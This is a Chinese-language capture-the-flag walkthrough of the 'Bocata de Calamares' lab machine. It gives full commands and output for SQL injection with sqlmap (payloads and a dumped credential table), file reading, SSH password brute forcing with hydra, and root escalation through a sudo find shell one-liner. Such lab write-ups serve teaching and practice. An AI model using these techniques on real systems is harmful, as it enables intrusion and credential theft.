TheHackersLabs-Bocata de Calamares靶机详解WP

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.149  08:00:27:9c:0f:82       (Unknown)
192.168.60.254  00:50:56:f0:df:73       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.952 seconds (131.15 hosts/sec). 4 responded
❯ export ip=192.168.60.149
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.149:22
Open 192.168.60.149:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 20:05 CST
Initiating ARP Ping Scan at 20:05
Scanning 192.168.60.149 [1 port]
Completed ARP Ping Scan at 20:05, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:05
Completed Parallel DNS resolution of 1 host. at 20:05, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:05
Scanning 192.168.60.149 [2 ports]
Discovered open port 80/tcp on 192.168.60.149
Discovered open port 22/tcp on 192.168.60.149
Completed SYN Stealth Scan at 20:05, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.149
Host is up, received arp-response (0.00054s latency).
Scanned at 2025-01-14 20:05:03 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:9C:0F:82 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

浏览器访问一下80端口

发现整个页面只有Sql注入的部分是有文章的，其他都是锚点连接

猜测拿user部分与Sql注入有关

扫描目录拿到login页面

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.149
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin.php            (Status: 200) [Size: 359]
/admin.php            (Status: 200) [Size: 359]
/images               (Status: 301) [Size: 178] [--> http://192.168.60.149/images/]
/index.php            (Status: 200) [Size: 4145]
/index.php            (Status: 200) [Size: 4145]
/login.php            (Status: 200) [Size: 2543]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

尝试利用最简单的SQL注入万能密码

有个待办list，发现给了一点提示，有个用户lee_archivos，经过Base64编码后的

Sql注入

同时我利用SQLMap对其数据进行dump

❯ sqlmap -u http://192.168.60.149/login.php --batch  --forms -D php -T usuarios --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.12#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:17:22 /2025-01-14/

[20:17:22] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6s6ccc6llee...ahfgivaj6t'). Do you want to use those [Y/n] Y
[20:17:22] [INFO] searching for forms
[1/1] Form:
POST http://192.168.60.149/login.php
POST data: alias=&password=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: alias=&password=] (Warning: blank fields detected): alias=&password=
do you want to fill blank fields with random values? [Y/n] Y
[20:17:22] [INFO] resuming back-end DBMS 'mysql'
[20:17:22] [INFO] using '/home/Pepster/.local/share/sqlmap/output/results-01142025_0817pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: alias (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: alias=-7116' OR 9008=9008#&password=etre

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: alias=GcxY' AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(5595=5595,1))),0x71707a6a71),5595)-- hfGE&password=etre

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: alias=GcxY' AND (SELECT 7246 FROM (SELECT(SLEEP(5)))oZXp)-- FilJ&password=etre
---
do you want to exploit this SQL injection? [Y/n] Y
[20:17:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.24.0
back-end DBMS: MySQL >= 5.6
[20:17:22] [INFO] fetching columns for table 'usuarios' in database 'php'
[20:17:22] [INFO] retrieved: 'alias'
[20:17:22] [INFO] retrieved: 'varchar(20)'
[20:17:22] [INFO] retrieved: 'contraseña'
[20:17:22] [INFO] retrieved: 'varchar(16)'
[20:17:22] [INFO] retrieved: 'email'
[20:17:22] [INFO] retrieved: 'varchar(30)'
[20:17:22] [INFO] retrieved: 'id'
[20:17:22] [INFO] retrieved: 'int'
[20:17:22] [INFO] retrieved: 'nombre'
[20:17:22] [INFO] retrieved: 'varchar(20)'
[20:17:22] [INFO] fetching entries for table 'usuarios' in database 'php'
[20:17:22] [INFO] retrieved: '123456'
[20:17:22] [INFO] retrieved: 'adminPrinc'
[20:17:22] [INFO] retrieved: '[email protected]'
[20:17:22] [INFO] retrieved: '1'
[20:17:22] [INFO] retrieved: 'admin'
[20:17:22] [INFO] retrieved: 'qwertyuiop'
[20:17:22] [INFO] retrieved: 'Pep100'
[20:17:22] [INFO] retrieved: '[email protected]'
[20:17:22] [INFO] retrieved: '2'
[20:17:22] [INFO] retrieved: 'pepe'
[20:17:22] [INFO] retrieved: 'jaime'
[20:17:22] [INFO] retrieved: 'Jaime_P'
[20:17:22] [INFO] retrieved: '[email protected]'
[20:17:22] [INFO] retrieved: '3'
[20:17:22] [INFO] retrieved: 'jaime'
[20:17:22] [INFO] retrieved: 'qwertyu'
[20:17:22] [INFO] retrieved: 'Richard'
[20:17:22] [INFO] retrieved: '[email protected]'
[20:17:22] [INFO] retrieved: '4'
[20:17:22] [INFO] retrieved: 'Ricardo'
Database: php
Table: usuarios
[4 entries]
+----+------------+---------------------+---------+--------------+
| id | alias      | email               | nombre  | contraseña   |
+----+------------+---------------------+---------+--------------+
| 1  | adminPrinc | [email protected] | admin   | 123456       |
| 2  | Pep100     | [email protected]      | pepe    | qwertyuiop   |
| 3  | Jaime_P    | [email protected]     | jaime   | jaime        |
| 4  | Richard    | [email protected] | Ricardo | qwertyu      |
+----+------------+---------------------+---------+--------------+

[20:17:22] [INFO] table 'php.usuarios' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.149/dump/php/usuarios.csv'
[20:17:22] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-01142025_0817pm.csv'

[*] ending @ 20:17:22 /2025-01-14/

这里我每个用户都试过了，在admin页面没有信息

文件读取

尝试上面拿到用户的信息

❯ echo  "lee_archivos" |base64
bGVlX2FyY2hpdm9zCg==

可以进行文件读取，拿到个用户superadministrator还有tyuiop

可以发现里面偷偷塞了个注释

Tengo que limitar los archivos que se pueden ver, al menos hasta que los usuarios tengan unas contraseñas más robustas –>

Si alguien leyera el archivo donde se encuentran los usuarios y usara la herramienta hydra para atacar nuestro servicio ssh… Bueno, mañana me encargare de ello

我必须限制可查看的文件，至少直到用户拥有更强大的密码

如果有人阅读包含用户信息的文件，并使用hydra工具攻击我们的ssh服务…嗯，明天我会处理这件事。

用户提权

提示给我们了，拿直接爆破得了

❯ hydra -l superadministrator -P /usr/share/wordlists/rockyou.txt ssh://$ip
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-14 20:44:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.149:22/
[22][ssh] host: 192.168.60.149   login: superadministrator   password: princesa
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-14 20:44:58

连上ssh登入用户

❯ ssh superadministrator@$ip
The authenticity of host '192.168.60.149 (192.168.60.149)' can't be established.
ED25519 key fingerprint is SHA256:FGZRACBwhyqZdv6wvuqfoIz1l1eoneHbjQfxlQPQz0o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? tes
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.60.149' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-51-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue Jan 14 12:44:58 PM UTC 2025

  System load:  0.35               Processes:               180
  Usage of /:   14.2% of 49.21GB   Users logged in:         0
  Memory usage: 8%                 IPv4 address for enp0s3: 192.168.60.149
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

1 update can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


Last login: Fri Jan 10 17:42:22 2025 from 192.168.1.38
superadministrator@thehackerslabs-bocatacalamares:~$ id
uid=1001(superadministrator) gid=1001(superadministrator) groups=1001(superadministrator),100(users)
superadministrator@thehackerslabs-bocatacalamares:~$ ls
flag.txt  recordatorio.txt
superadministrator@thehackerslabs-bocatacalamares:~$ cat flag.txt
c3VkbyAtbAo=	#解码后sudo -l
superadministrator@thehackerslabs-bocatacalamares:~$ cat recordatorio.txt
Me han dicho que existe una pagina llamada gtfobins muy util para ctfs, la dejo aquí apuntada para recordarlo mas adelante.
superadministrator@thehackerslabs-bocatacalamares:~$ sudo -l
Matching Defaults entries for superadministrator on
    thehackerslabs-bocatacalamares:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User superadministrator may run the following commands on
        thehackerslabs-bocatacalamares:
    (ALL) NOPASSWD: /usr/bin/find

挺贴心的，还给个提示，对小白友好

Me han dicho que existe una pagina llamada gtfobins muy util para ctfs, la dejo aquí apuntada para recordarlo mas adelante.

有人告诉我有一个名为gtfobins的网站非常适用于ctfs，我把它留在这里以便日后记起。

Root提权

find提权即可

superadministrator@thehackerslabs-bocatacalamares:~$ sudo find . -exec /bin/sh \; -quit
id
id
# uid=0(root) gid=0(root) groups=0(root)
# cd ~
# ls
root.txt
# cat root.txt
S0Y_UN_h4K3R